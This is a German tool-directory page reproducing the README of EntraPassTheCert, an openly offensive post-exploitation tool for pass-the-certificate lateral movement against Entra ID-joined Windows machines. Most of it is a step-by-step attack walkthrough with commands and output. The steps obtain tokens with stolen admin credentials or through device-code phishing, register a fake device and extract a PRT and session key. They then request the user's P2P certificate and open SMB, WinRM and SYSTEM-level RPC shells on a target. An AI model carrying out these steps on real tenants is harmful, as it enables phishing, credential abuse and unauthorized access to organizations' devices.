Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EntraPassTheCert — Werkzeug zum Anfordern des P2P-Zertifikats von Entra ID und zur Authentifizierung an entfernten Entra-verbundenen Geräten damit. | Kitploit
Tools/GitHubGitHub/temp43487580/entrapassthecert
Laterale BewegungPost-ExploitationPenetrationstestsCloud-SicherheitIdentitäts- & Zugriffsmanagement (IAM)AuthentifizierungRed Teaming
GitHubtemp43487580/entrapassthecert

EntraPassTheCert

Werkzeug zum Anfordern des P2P-Zertifikats von Entra ID und zur Authentifizierung an entfernten Entra-verbundenen Geräten damit.

Repository anzeigen
13516vor 0 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

EntraPassTheCert

EntraPassTheCert ist ein Post-Exploitation-Tool, das es Angreifern ermöglicht, das P2P-Zertifikat eines Entra-ID-Benutzers anzufordern und sich damit an einem entfernten, mit Entra verbundenen Rechner zu authentifizieren.

root@kitploit:~
$ python3 entraptc.py -h

usage: entraptc.py [-h] [--debug] {request_p2pcert,smb,rdp,winrm,rpc} ...

post-exploitation tool for requesting p2p cert and authenticate with it

positional arguments:
  {request_p2pcert,smb,rdp,winrm,rpc}
                        Available commands
    request_p2pcert     request P2P cert with PRT and SessionKey
    smb                 SMB to Entra joinned machine with P2P cert
    rdp                 RDP to Entra joinned machine with P2P cert
    winrm               WinRM to Entra joinned machine with P2P cert
    rpc                 RPC to Entra joinned machine with P2P cert

options:
  -h, --help            show this help message and exit
  --debug               debug option

Der Code basiert auf den vorhandenen großartigen Tools.

  • impacket
  • ROADTools
  • AADInternals
  • pywinrm
  • aardwolf

Dieses Tool wird auf den Troopers 2025 präsentiert:

Hopping Accross Devices: Expanding Lateral Movement through Pass-the-Certificate Attack

Verwendung

P2P-Zertifikat anfordern

Beschaffen Sie zunächst die erforderlichen Microsoft-Entra-Tokens mit den Anmeldeinformationen eines Kontos, das lokalen Administratorzugriff auf ein Zielgerät besitzt.

root@kitploit:~
$ roadtx gettokens -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e -u globaladmin@***.onmicrosoft.com -p $PASSWORD
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
Tokens were written to .roadtools_auth

Falls Sie nicht über die Anmeldeinformationen verfügen, können Sie auch Device-Code-Phishing ausführen, um die Tokens zu beschaffen.

root@kitploit:~
$ roadtx gettokens --device-code -r devicereg -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource urn:ms-drs:enterpriseregistration.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code HGCUCJ6CS to authenticate.
Tokens were written to .roadtools_auth

Registrieren Sie als Nächstes ein gefälschtes Gerät bei Entra ID.

root@kitploit:~
$ roadtx device -a join -n fake_device
Saving private key to fake_device.key
Registering device
Device ID: 0d9d2d66-7343-4bf2-a3dd-377c9e1e6244
Saved device certificate to fake_device.pem

Fordern Sie dann mit dem registrierten Gerät PRT und Sitzungsschlüssel an.

root@kitploit:~
$ REFRESHTOKEN=(`cat .roadtools_auth | jq -r .refreshToken`) 

$ roadtx prt -c fake_device.pem -k fake_device.key -r $REFRESHTOKEN
Obtained PRT: 1.AT0A7mRQZ....
Obtained session key: fabd04bf017c526fd...
Saved PRT to roadtx.prt

Sobald Sie PRT und Sitzungsschlüssel erhalten haben, können Sie das P2P-Zertifikat des Benutzers anfordern.

root@kitploit:~
$ PRT=(`cat roadtx.prt | jq -r .refresh_token`)

$ SESSIONKEY=(`cat roadtx.prt | jq -r .session_key`)

$ python3 entraptc.py request_p2pcert --prt $PRT --sessionkey $SESSIONKEY
[*] requesting P2P cert...
[+] successfully acquired P2P cert!
[*] here is your p2p cert pfx : p2pcert.pfx (pw: password)

P2P-Zertifikat weiterreichen

Sie können sich mit dem P2P-Zertifikat wie folgt an einem mit Entra verbundenen Rechner authentifizieren.

  • SMB
root@kitploit:~
$ python3 entraptc.py smb --target 192.168.153.133 --pfx p2pcert.pfx      
[*] connecting to 192.168.153.133 via SMB...
[+] sucessfully logged-on to the system!
Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw-          0  Fri May 30 15:52:50 2025 $Recycle.Bin
drw-rw-rw-          0  Sat Apr 19 01:54:46 2025 Documents and Settings
-rw-rw-rw-      12288  Sun Jun 15 10:45:59 2025 DumpStack.log.tmp
drw-rw-rw-          0  Fri May 30 09:06:09 2025 inetpub
-rw-rw-rw-  738197504  Sun Jun 15 10:45:58 2025 pagefile.sys
drw-rw-rw-          0  Sat Apr 19 02:49:28 2025 PerfLogs
drw-rw-rw-          0  Tue Jun 10 14:58:44 2025 Program Files
drw-rw-rw-          0  Tue May 27 15:59:56 2025 Program Files (x86)
drw-rw-rw-          0  Tue Jun 10 14:54:46 2025 ProgramData
drw-rw-rw-          0  Sat Apr 19 01:53:41 2025 Recovery
-rw-rw-rw-   16777216  Sun Jun 15 10:45:59 2025 swapfile.sys
drw-rw-rw-          0  Fri May 30 09:39:44 2025 System Volume Information
drw-rw-rw-          0  Fri May 30 15:52:23 2025 Users
drw-rw-rw-          0  Wed Jun 11 09:30:27 2025 Windows
  • WinRM
root@kitploit:~
$ python3 entraptc.py winrm --target 192.168.153.133 --pfx p2pcert.pfx
[*] connecting to 192.168.153.133 via WinRM...
[+] sucessfully logged-on to the system!

C:\Users\admin> whoami
azuread\admin
  • RPC
root@kitploit:~
$ python3 entraptc.py rpc --target 192.168.153.133 --pfx p2pcert.pfx                                                                   

[*] connecting to 192.168.153.133 via RPC...
[+] sucessfully logged-on to the system!

C:\Windows\System32>whoami
nt authority\system
  • RDP
    • Sie müssen die Anmeldeinformationen des Kontos angeben
root@kitploit:~
$ python3 entraptc.py rdp --username globaladmin@***.onmicrosoft.com --password $PASSWORD --target 192.168.153.133 --pfx p2pcert.pfx

Hinweise

  • Der Zielrechner sollte eine Entra-verbundene Maschine sein, keine hybrid mit Entra verbundene oder bei Entra registrierte Maschine
  • Getestet auf Windows 11/10-Rechnern, nicht jedoch auf Windows Server

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungs- und Forschungszwecken.
Es soll Sicherheitsexperten, Forschern und Studierenden helfen, potenzielle Angriffsvektoren zu verstehen und Verteidigungsmaßnahmen zu verbessern.

Referenz

https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597

Tool herunterladen